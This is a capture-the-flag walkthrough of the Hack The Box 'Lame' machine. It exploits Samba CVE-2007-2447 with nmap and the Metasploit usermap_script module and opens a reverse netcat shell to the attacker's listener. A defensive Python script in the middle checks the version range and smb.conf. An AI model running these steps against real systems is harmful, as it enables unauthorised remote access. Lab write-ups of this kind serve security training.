4/30/2022

HTB: Lame

 ___  ___  _________  ________                   
|\  \|\  \|\___   ___\\   __  \  ___             
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\            
 \ \   __  \   \ \  \ \ \   __  \|__|            
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___          
   \ \__\ \__\   \ \__\ \ \_______\|\__\         
    \|__|\|__|    \|__|  \|_______|\|__|         
 ___       ________  _____ ______   _______      
|\  \     |\   __  \|\   _ \  _   \|\  ___ \     
\ \  \    \ \  \|\  \ \  \\\__\ \  \ \   __/|    
 \ \  \    \ \   __  \ \  \\|__| \  \ \  \_|/__  
  \ \  \____\ \  \ \  \ \  \    \ \  \ \  \_|\ \ 
   \ \_______\ \__\ \__\ \__\    \ \__\ \_______\
    \|_______|\|__|\|__|\|__|     \|__|\|_______| 

Hack The Box's Lame is an Easy machine that features CVE-2007-2447, a vulnerability first disclosed in 2007 that affected Samba 3.0.0 through 3.0.25rc3. You can learn more about this vulnerability's CVE details here.

After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to make sure the network path is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.129.136.4

You should receive responses from the IP address. Press CTRL + C to stop sending packets to the target host. Once you have confirmed the network is up and running, it's time to move on to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:

nmap -sV -Pn 10.129.136.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 22:52 BST
Nmap scan report for 10.129.136.4
Host is up (0.015s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds

On port 21 we can see that vsftpd 2.3.4 is running. This version is usually exploitable through a built-in backdoor, but that backdoor does not work on this machine. Let's look instead at the Samba smbd service running on port 139. After doing some research, we find this service can be exploited through the "username map script" configuration option to run commands: the affected Samba versions hand the supplied username to that script through a shell without sanitising it, so this only applies when the option is actually set in smb.conf.
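From the defender's side, the two questions raised above are whether the Samba build is inside the affected range and whether "username map script" is set at all. The following Python is an added example, not code from the original post or from any tool it uses: it parses normal Nmap output (the sample is a copy of the scan above, embedded as a constructed input), reports whether each Samba banner is precise enough to decide, and checks a constructed smb.conf fragment for the option. The script path in the sample configuration is hypothetical.

```python
import re

# Affected range as stated in the write-up: Samba 3.0.0 through 3.0.25rc3 (CVE-2007-2447).
CVE_2007_2447_FIRST = "3.0.0"
CVE_2007_2447_LAST = "3.0.25rc3"

_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:(rc)(\d+)|([a-z]))?$")


def parse_samba_version(version):
    """Turn a Samba version string into a comparable tuple, or None if it is not precise.

    Ordering produced: 3.0.25rc1 < 3.0.25rc3 < 3.0.25 < 3.0.25a.
    """
    m = _VER_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    if m.group(4):  # release candidate: sorts before the final release of the same number
        return (major, minor, patch, 0, int(m.group(5)))
    suffix = m.group(6)
    letter = (ord(suffix) - ord("a") + 1) if suffix else 0  # 3.0.25a sorts after 3.0.25
    return (major, minor, patch, 1, letter)


def samba_in_cve_2007_2447_range(version):
    """True/False for a precise version; None when the banner cannot be decided."""
    parsed = parse_samba_version(version)
    if parsed is None:
        return None
    return parse_samba_version(CVE_2007_2447_FIRST) <= parsed <= parse_samba_version(CVE_2007_2447_LAST)


_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_ports(text):
    """Extract the PORT/STATE/SERVICE/VERSION rows from normal Nmap output."""
    rows = []
    for line in text.splitlines():
        m = _PORT_RE.match(line.strip())
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                         "service": m.group(4), "version": m.group(5).strip()})
    return rows


_SAMBA_BANNER_RE = re.compile(r"Samba smbd (\S+)")


def triage_samba(nmap_text):
    """Map each open Samba port to 'vulnerable', 'not_vulnerable' or 'inconclusive'.

    A banner such as '3.X - 4.X' is deliberately reported as inconclusive: the
    version must be confirmed from the host (e.g. the package manager) before
    the CVE range check means anything.
    """
    verdicts = {}
    for row in parse_nmap_ports(nmap_text):
        m = _SAMBA_BANNER_RE.search(row["version"])
        if row["state"] != "open" or not m:
            continue
        result = samba_in_cve_2007_2447_range(m.group(1))
        verdicts[row["port"]] = {True: "vulnerable", False: "not_vulnerable", None: "inconclusive"}[result]
    return verdicts


# Only an uncommented line counts; ';' and '#' comment lines do not match because
# the pattern requires the option name at the start of the line after whitespace.
_MAP_SCRIPT_RE = re.compile(r"^\s*username\s+map\s+script\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)


def username_map_script(smb_conf):
    """Return the configured 'username map script' value, or None when the option is unset."""
    m = _MAP_SCRIPT_RE.search(smb_conf)
    return m.group(1) if m else None


# Constructed input: a copy of the scan output shown in this write-up.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""

# Constructed smb.conf fragment; the script path is hypothetical.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/disabled.sh
   username map script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    print("Samba ports:", triage_samba(SAMPLE_NMAP))
    print("username map script:", username_map_script(SAMPLE_SMB_CONF))
```

Run against the scan above, both Samba ports come back inconclusive, which is the honest answer: Nmap's "3.X - 4.X" banner cannot place the build inside or outside 3.0.0 to 3.0.25rc3, so the version has to be confirmed on the host. The configuration check is the mitigation side: if `username map script` is unset, the code path this CVE abuses is not reachable regardless of version.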

Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

Let's search for Samba exploits using the "search" command.

search samba 3.0

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script         2007-05-14       excellent  No     Samba "username map script" Command Execution
   1  exploit/linux/samba/chain_reply            2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   2  exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   3  exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow


Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/lsa_transnames_heap

The exploit we are looking to use is the first one, exploit/multi/samba/usermap_script. To load an exploit, type "use" followed by the exploit's index number from the search results.

Once the exploit has loaded, type "options" and hit Enter. This lists the exploit's options, which we will need to configure.

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                      Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  147.182.150.190  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > 

RPORT is preconfigured to the correct port, but RHOSTS is blank and is required to run the exploit. To set it, type "set RHOSTS" followed by the IP of the target machine and hit Enter. Metasploit echoes a confirmation line with the RHOSTS value it has stored.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.136.4
RHOSTS => 10.129.136.4
msf6 exploit(multi/samba/usermap_script) > 

You may need to change the payload options LHOST and LPORT if you are using a VPN, a virtual machine, or the HTB PWNBOX: LHOST must be an address the target can reach back to. Most of the time this is done by entering "set LHOST" followed by your interface name, usually "tun0", which Metasploit resolves to that interface's address. With everything set, it's time to run the exploit: type "run" and hit Enter.

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.75:4444 
[*] Command shell session 1 opened (10.10.14.75:4444 -> 10.129.136.4:34959) at 2022-04-30 23:20:35 +0100

Looks like we got a command shell session! Let's type "shell" to get an interactive shell.

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

You can now navigate the target system with ordinary Linux commands to obtain the user and root .txt flags.